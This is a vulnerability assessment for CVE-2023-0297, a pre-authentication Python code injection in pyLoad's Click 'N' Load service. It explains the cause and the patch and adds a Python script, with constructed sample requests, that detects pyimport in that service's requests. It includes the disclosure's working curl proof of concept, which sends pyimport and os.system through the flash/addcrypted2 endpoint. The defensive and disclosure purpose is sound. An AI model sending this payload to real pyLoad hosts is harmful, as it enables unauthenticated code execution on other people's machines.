Attacker Value: Low (1 user assessed)
Exploitability: Very High (1 user assessed)
User Interaction: None
Privileges Required: None
Attack Vector: Network

CVE-2023-0297

Disclosure Date: January 14, 2023

Description

Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.

Technical Analysis

Description

pyLoad versions prior to 0.5.0b3.dev31 are vulnerable to Python code injection due to the pyimport functionality exposed through the js2py library. An unauthenticated attacker can issue a crafted POST request to the flash/addcrypted2 endpoint to leverage this for code execution. pyLoad by default runs two services, the primary of which is on port 8000 and cannot be used by external hosts. A secondary “Click ‘N’ Load” service runs on port 9666 and can be used remotely without authentication.

The vulnerability was patched in commit 7d73ba79 by disabling the pyimport statement within the js2py execution environment.

From the original disclosure, the vulnerability can be validated with curl:

curl -i -s -k -X $'POST' \
    --data-binary $'jk=pyimport%20os;os.system(\"touch%20/tmp/pwnd\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
    $'http://127.0.0.1:9666/flash/addcrypted2'

Vulnerable instances will respond with a 500 error and a message that the decryption failed.

HTTP/1.1 500 INTERNAL SERVER ERROR
Content-Type: text/html; charset=utf-8
Content-Length: 21
Access-Control-Max-Age: 1800
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: OPTIONS, GET, POST
Vary: Accept-Encoding
Date: Thu, 16 Feb 2023 17:02:16 GMT
Server: Cheroot/8.6.0

Could not decrypt key

Patched instances (v0.5.0) will also respond with a 500 error but the body of the response will include a stack trace in HTML with the following error:

<p><b>Error 500: SyntaxError: Line 1: Unexpected token pyimport</b></p>
<p><b>Traceback (most recent call last):</b></p>
<p><b>  File &#34;/usr/lib/python3.10/site-packages/flask/app.py&#34;, line 1820, in full_dispatch_request</b></p>
<p><b>    rv = self.dispatch_request()</b></p>
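Detection logic for the request pattern described in this assessment, as an added example that is not part of the original assessment or of pyLoad itself: it URL-decodes the jk field of POST bodies sent to /flash/addcrypted2 and flags a standalone pyimport statement, including a double-encoded one. The endpoint and parameter come from the assessment; the function names and the request records are constructed, not captured traffic.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Endpoint and parameter named in the assessment; the Click 'N' Load service listens on port 9666.
TARGET_PATH = "/flash/addcrypted2"

# js2py accepts "pyimport <module>" as a statement. Match it as a standalone token so a
# legitimate identifier such as "pyimporter" is not flagged.
PYIMPORT_RE = re.compile(r"(?<![A-Za-z0-9_])pyimport\s+[A-Za-z_][A-Za-z0-9_.]*")

def extract_pyimports(body):
    """Return every pyimport statement found in the jk field of a form-encoded body.

    The value is decoded a second time with unquote_plus so that a double-encoded
    value (pyimport%2520os) is still inspected rather than slipping past the check.
    """
    fields = parse_qs(body, keep_blank_values=True)
    hits = []
    for jk in fields.get("jk", []):
        decoded = unquote_plus(jk)
        hits.extend(m.group(0) for m in PYIMPORT_RE.finditer(decoded))
    return hits

def classify_request(method, path, body):
    """Classify one request as 'exploit_attempt', 'cnl_request' or 'ignore'."""
    if method != "POST" or path.split("?", 1)[0] != TARGET_PATH:
        return "ignore"
    return "exploit_attempt" if extract_pyimports(body) else "cnl_request"

# Constructed sample records (method, path, body); the first mirrors the shape of the
# disclosure's proof of concept, the third is the same statement double-encoded.
SAMPLE_REQUESTS = [
    ("POST", TARGET_PATH, "jk=pyimport%20os;f=function%20f2(){};&package=xxx&crypted=AAAA&passwords=aaaa"),
    ("POST", TARGET_PATH, "jk=function%20f(){return%20'0123456789abcdef'};&package=demo&crypted=AAAA"),
    ("POST", TARGET_PATH, "jk=pyimport%2520os;f=function%20f2(){};&package=x&crypted=AAAA"),
    ("GET", "/flash/", ""),
]

def scan(records=SAMPLE_REQUESTS):
    """Count records per class; any 'exploit_attempt' warrants an alert."""
    counts = {"exploit_attempt": 0, "cnl_request": 0, "ignore": 0}
    for method, path, body in records:
        counts[classify_request(method, path, body)] += 1
    return counts

if __name__ == "__main__":
    print(scan())
```

Because the Click 'N' Load service accepts unauthenticated requests from remote hosts, any hit on port 9666 from outside the local network is worth investigating even if the instance is already patched.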
CVSS V3 Severity and Metrics

Base Score: 9.8 Critical
Impact Score: 5.9
Exploitability Score: 3.9
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

General Information

Vendors

  • pyload

Products

  • pyload
